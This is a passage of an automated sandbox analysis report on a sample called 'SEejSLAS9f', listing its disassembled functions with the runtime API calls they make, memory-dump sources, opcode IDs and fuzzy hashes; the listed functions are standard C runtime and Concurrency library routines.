                                                              • Opcode Fuzzy Hash: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                              • Instruction Fuzzy Hash: 7A11A075500104EACB14EFA5CC49FEF77B8AF00701F24022BF519E21D1EB789A84C66D
                                                              APIs
                                                              • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00415249
                                                                • Part of subcall function 00414C5A: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 00414C6E
                                                              • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00415272
                                                                • Part of subcall function 004130D4: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004130F0
                                                              • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00415299
                                                              • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00415153
                                                                • Part of subcall function 00413138: __EH_prolog3_GS.LIBCMT ref: 0041313F
                                                                • Part of subcall function 00413138: GetCurrentProcess.KERNEL32(0045CB84,0045CB88,00000024), ref: 0041314E
                                                                • Part of subcall function 00413138: GetProcessAffinityMask.KERNEL32(00000000), ref: 00413155
                                                                • Part of subcall function 00413138: GetCurrentThread.KERNEL32 ref: 0041317D
                                                                • Part of subcall function 00413138: Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 00413187
                                                              • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00415174
                                                              • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004151AB
                                                              • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004151EE
                                                              • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 004152E1
                                                              • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00415305
                                                              • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00415312
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Concurrency::details::$AffinityManager::Resource$ApplyRestrictions$InformationProcess$Topology$CaptureCurrentHardware$Affinity::CleanupConcurrency::details::platform::__FindGroupH_prolog3_LogicalMaskProcessorRestriction::Thread
                                                              • String ID:
                                                              • API String ID: 64082781-0
                                                              • Opcode ID: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                              • Instruction ID: 68d129af9073e170e0bd2ed5c1ca810268e1faaa5ea0560f3945f8c62b51e45f
                                                              • Opcode Fuzzy Hash: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                              • Instruction Fuzzy Hash: 8B619B72A00715DFDB18CFA5E8D26EEB7B1FB84316F24806ED45697242D738A981CF48
                                                              APIs
                                                              • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 024854B0
                                                                • Part of subcall function 02484EC1: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 02484ED5
                                                              • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 024854D9
                                                                • Part of subcall function 0248333B: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02483357
                                                              • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 02485500
                                                              • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 024853BA
                                                                • Part of subcall function 0248339F: __EH_prolog3_GS.LIBCMT ref: 024833A6
                                                                • Part of subcall function 0248339F: GetCurrentProcess.KERNEL32(0045CB84,0045CB88,00000024), ref: 024833B5
                                                                • Part of subcall function 0248339F: GetProcessAffinityMask.KERNEL32(00000000), ref: 024833BC
                                                                • Part of subcall function 0248339F: GetCurrentThread.KERNEL32 ref: 024833E4
                                                                • Part of subcall function 0248339F: Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 024833EE
                                                              • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 024853DB
                                                              • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02485412
                                                              • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02485455
                                                              • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 02485548
                                                              • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 0248556C
                                                              • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 02485579
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Concurrency::details::$AffinityManager::Resource$ApplyRestrictions$InformationProcess$Topology$CaptureCurrentHardware$Affinity::CleanupConcurrency::details::platform::__FindGroupH_prolog3_LogicalMaskProcessorRestriction::Thread
                                                              • String ID:
                                                              • API String ID: 64082781-0
                                                              • Opcode ID: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                              • Instruction ID: ec1f16e40baab32c02cbf91ea27a877f726b235705fac7ff2e0b1e332acdcbbc
                                                              • Opcode Fuzzy Hash: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                              • Instruction Fuzzy Hash: 3D61A9719203119FCB18EFA5E8D17AEBBA2FF44716FA5807EC446A7282C730A941CF44
                                                              APIs
                                                              • GetCurrentThreadId.KERNEL32 ref: 02490C36
                                                              • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 02490C9D
                                                              • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 02490CBA
                                                              • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 02490D20
                                                              • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 02490D35
                                                              • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 02490D47
                                                              • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 02490D75
                                                              • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 02490D80
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 02490DAC
                                                              • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 02490DBC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
                                                              • String ID:
                                                              • API String ID: 3720063390-0
                                                              • Opcode ID: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                              • Instruction ID: 299487b525ae075706d47c35fb448070024d7cbc4596ec6adf551d963ab329b9
                                                              • Opcode Fuzzy Hash: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                              • Instruction Fuzzy Hash: CC41B230A142489BDF19FFA5C4547FD7BA6AF42304F14406FD8166B382CB659A09CF65
                                                              APIs
                                                              • _free.LIBCMT ref: 00431DFA
                                                                • Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                              • _free.LIBCMT ref: 00431E06
                                                              • _free.LIBCMT ref: 00431E11
                                                              • _free.LIBCMT ref: 00431E1C
                                                              • _free.LIBCMT ref: 00431E27
                                                              • _free.LIBCMT ref: 00431E32
                                                              • _free.LIBCMT ref: 00431E3D
                                                              • _free.LIBCMT ref: 00431E48
                                                              • _free.LIBCMT ref: 00431E53
                                                              • _free.LIBCMT ref: 00431E61
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                              • Instruction ID: 861173ad91a1010c78510ab484a24ed9c78665ad215b99cbbf48ba7f2ea438f1
                                                              • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                              • Instruction Fuzzy Hash: 5811B9B6600508BFDB02EF5AC852CD93BA5EF18755F0190AAF9084F232D635DF559F84
                                                              APIs
                                                              • _free.LIBCMT ref: 024A2061
                                                                • Part of subcall function 024A36D1: HeapFree.KERNEL32(00000000,00000000,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?), ref: 024A36E7
                                                                • Part of subcall function 024A36D1: GetLastError.KERNEL32(?,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?,?), ref: 024A36F9
                                                              • _free.LIBCMT ref: 024A206D
                                                              • _free.LIBCMT ref: 024A2078
                                                              • _free.LIBCMT ref: 024A2083
                                                              • _free.LIBCMT ref: 024A208E
                                                              • _free.LIBCMT ref: 024A2099
                                                              • _free.LIBCMT ref: 024A20A4
                                                              • _free.LIBCMT ref: 024A20AF
                                                              • _free.LIBCMT ref: 024A20BA
                                                              • _free.LIBCMT ref: 024A20C8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                              • Instruction ID: 50f597ad08e1649174e4b31d26c983b551346de7ec64346999a12fc7123fd680
                                                              • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                              • Instruction Fuzzy Hash: 8F117476600508AFCB51EF5AC851CD93FA6EF14790B5140AABE098F221EB71EE609F80
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: __cftoe
                                                              • String ID: F(@$F(@
                                                              • API String ID: 4189289331-2038261262
                                                              • Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                              • Instruction ID: f7128e803ecc638eadc91937d15ccb8599414b14ec088efe1e3a9152a03639fe
                                                              • Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                              • Instruction Fuzzy Hash: 35511A32600215EBEB209F5BAC41FAF77A9EF49324F94425FF81592282DB39D900866D
                                                              APIs
                                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044018F), ref: 0043EEC5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: DecodePointer
                                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                              • API String ID: 3527080286-3064271455
                                                              • Opcode ID: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
                                                              • Instruction ID: 8170d9845b751ca2959588a2f937d780391b5e174033125a046a2bd7c9c475e6
                                                              • Opcode Fuzzy Hash: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
                                                              • Instruction Fuzzy Hash: 3351AF7090050EDBDF14DF99E6481ADBBB0FB4D300F2551A7E480A7295C77A8D29CB1E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                              • Instruction ID: 34582cfed4f7afd47f8a04efedb635044b3869a79fde31d04e057d8cd1e16a32
                                                              • Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                              • Instruction Fuzzy Hash: DCC1C070E04349AFDF12DFADC850BAEBFB1AF1A304F04419AE414AB391E7749941CB61
                                                              APIs
                                                              • _ValidateLocalCookies.LIBCMT ref: 004286FB
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00428703
                                                              • _ValidateLocalCookies.LIBCMT ref: 00428791
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 004287BC
                                                              • _ValidateLocalCookies.LIBCMT ref: 00428811
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: fB$csm
                                                              • API String ID: 1170836740-1586063737
                                                              • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                              • Instruction ID: 7444ce20eee9e01817f939fbe5b18052b9a848ec9e24e3aae95877e68e098c30
                                                              • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                              • Instruction Fuzzy Hash: F241FB34F012289BCF10DF19DC41A9EBBB5AF84318F64816FE9145B392DB399D11CB99
                                                              APIs
                                                              • atomic_compare_exchange.LIBCONCRT ref: 0248C6DC
                                                              • atomic_compare_exchange.LIBCONCRT ref: 0248C700
                                                              • std::_Cnd_initX.LIBCPMT ref: 0248C711
                                                              • std::_Cnd_initX.LIBCPMT ref: 0248C71F
                                                                • Part of subcall function 02471370: __Mtx_unlock.LIBCPMT ref: 02471377
                                                              • std::_Cnd_initX.LIBCPMT ref: 0248C72F
                                                                • Part of subcall function 0248C3EF: __Cnd_broadcast.LIBCPMT ref: 0248C3F6
                                                              • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0248C73D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
                                                              • String ID: t#D
                                                              • API String ID: 4258476935-1671555958
                                                              • Opcode ID: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
                                                              • Instruction ID: f569ce9ec2b7a229be66d557a78a16237813ca616791f7b0fe54a863ae9fede2
                                                              • Opcode Fuzzy Hash: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
                                                              • Instruction Fuzzy Hash: 1101F771910605ABDB15B7B6CDC4BDEB35EAF00310F54001BE91597680DBB4AA158FA2
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D938,0042D938,?,?,?,00432385,00000001,00000001,23E85006), ref: 0043218E
                                                              • __alloca_probe_16.LIBCMT ref: 004321C6
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432385,00000001,00000001,23E85006,?,?,?), ref: 00432214
                                                              • __alloca_probe_16.LIBCMT ref: 004322AB
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043230E
                                                              • __freea.LIBCMT ref: 0043231B
                                                                • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                              • __freea.LIBCMT ref: 00432324
                                                              • __freea.LIBCMT ref: 00432349
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 3864826663-0
                                                              • Opcode ID: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
                                                              • Instruction ID: 93f6329b7fe105f45c70b5aed5e0df07748c8d3fe3b6be6f44c821e7de56536e
                                                              • Opcode Fuzzy Hash: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
                                                              • Instruction Fuzzy Hash: 5851F472610216AFDB258F71CE41EAF77A9EB48B54F14522AFD04D7280DBBCDC40C698
                                                              APIs
                                                                • Part of subcall function 024A2141: GetLastError.KERNEL32(?,?,0249A9EC,?,00000000,?,0249CDE6,0247247E,00000000,?,00451F20), ref: 024A2145
                                                                • Part of subcall function 024A2141: _free.LIBCMT ref: 024A2178
                                                                • Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21B9
                                                              • _free.LIBCMT ref: 024A1444
                                                              • _free.LIBCMT ref: 024A145D
                                                              • _free.LIBCMT ref: 024A148F
                                                              • _free.LIBCMT ref: 024A1498
                                                              • _free.LIBCMT ref: 024A14A4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorLast
                                                              • String ID: C
                                                              • API String ID: 3291180501-1037565863
                                                              • Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                              • Instruction ID: 5116b0abada86bb7d165f5444f58669002a187c5d5234c72b7cf3bd9fb6791e7
                                                              • Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                              • Instruction Fuzzy Hash: 2DB12775A012299FDB24DF18C894BAEB7B5FB18304F1445AED84DA7390E770AE90CF40
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                              • Instruction ID: bfd9ead29151d2877f631d1061df4e601ee651aa38b3335c59b440bd117a4214
                                                              • Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                              • Instruction Fuzzy Hash: 9361F171900205AFDB20DF69C842B9EBBF4EB08710F14516BE884EB382E7399D41CB59
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                              • Instruction ID: 98b794772e495da6d9d74359f85992a6912aa08e5e2d37ba04da51f5fbb31c89
                                                              • Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                              • Instruction Fuzzy Hash: D061D272900215AFDB20CFA9C851B9ABBF6FF59710F2441ABE844EB341E771A991CB50
                                                              APIs
                                                              • GetConsoleCP.KERNEL32(?,0042C23D,E0830C40,?,?,?,?,?,?,00433FF8,0040DDD5,0042C23D,?,0042C23D,0042C23D,0040DDD5), ref: 004338C5
                                                              • __fassign.LIBCMT ref: 00433940
                                                              • __fassign.LIBCMT ref: 0043395B
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,0042C23D,00000001,?,00000005,00000000,00000000), ref: 00433981
                                                              • WriteFile.KERNEL32(?,?,00000000,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339A0
                                                              • WriteFile.KERNEL32(?,0040DDD5,00000001,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339D9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                              • String ID:
                                                              • API String ID: 1324828854-0
                                                              • Opcode ID: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
                                                              • Instruction ID: 0964c92a74c3400c6cb4ab9b4b67413798647f05f85f7adc4f4dadb846cf7038
                                                              • Opcode Fuzzy Hash: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
                                                              • Instruction Fuzzy Hash: 3451C271E00209AFDB10DFA8D885BEEBBF4EF09301F14412BE556E7291E7749A41CB69
                                                              APIs
                                                              • GetConsoleCP.KERNEL32(?,0249C4A4,E0830C40,?,?,?,?,?,?,024A425F,0247E03C,0249C4A4,?,0249C4A4,0249C4A4,0247E03C), ref: 024A3B2C
                                                              • __fassign.LIBCMT ref: 024A3BA7
                                                              • __fassign.LIBCMT ref: 024A3BC2
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,0249C4A4,00000001,?,00000005,00000000,00000000), ref: 024A3BE8
                                                              • WriteFile.KERNEL32(?,?,00000000,024A425F,00000000,?,?,?,?,?,?,?,?,?,024A425F,0247E03C), ref: 024A3C07
                                                              • WriteFile.KERNEL32(?,0247E03C,00000001,024A425F,00000000,?,?,?,?,?,?,?,?,?,024A425F,0247E03C), ref: 024A3C40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                              • String ID:
                                                              • API String ID: 1324828854-0
                                                              • Opcode ID: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
                                                              • Instruction ID: 84bc4c91e45cf4b55f8d9e45d862e0fafb45de2b319ebaeded20b911245305d8
                                                              • Opcode Fuzzy Hash: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
                                                              • Instruction Fuzzy Hash: D351E575A00208AFDB10CFA8DC94AEEBBF5EF19700F14415FE555E7291E7309A81CB60
                                                              APIs
                                                              • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 02494ACD
                                                                • Part of subcall function 02494D9C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,02494800), ref: 02494DAC
                                                              • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 02494AE2
                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 02494AF1
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 02494AFF
                                                              • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 02494B75
                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 02494BB5
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 02494BC3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                              • String ID:
                                                              • API String ID: 3151764488-0
                                                              • Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                              • Instruction ID: 27807ad9f185a068bac2a013616ef9592b8f6e11a618ce762696f387e6df2841
                                                              • Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                              • Instruction Fuzzy Hash: 4331B439A002149BCF04EF69C885B6E7BB6FF44714F20456BD9259B381DB70EA06CB94
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                              • Instruction ID: 860e752c6eb2c716a5d855c3c03ea0c0e6c73714a276bf2c7701abe861d4aafe
                                                              • Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                              • Instruction Fuzzy Hash: 51113A72A00216BFD7206FB7AC04F6B7B6CEF8A735F10123BF815C7240DA3889048669
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                              • Instruction ID: a3147bb91cd1a6b519d6c0c9a95b65df1d0121d9278bc457663a3614d2c08a48
                                                              • Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                              • Instruction Fuzzy Hash: CB11D632605125BFDB216F778C5896B7E6DFF96B61B110A2BFC15C7240DB318845CAB0
                                                              APIs
                                                                • Part of subcall function 0043A0CA: _free.LIBCMT ref: 0043A0F3
                                                              • _free.LIBCMT ref: 0043A3D1
                                                                • Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                              • _free.LIBCMT ref: 0043A3DC
                                                              • _free.LIBCMT ref: 0043A3E7
                                                              • _free.LIBCMT ref: 0043A43B
                                                              • _free.LIBCMT ref: 0043A446
                                                              • _free.LIBCMT ref: 0043A451
                                                              • _free.LIBCMT ref: 0043A45C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
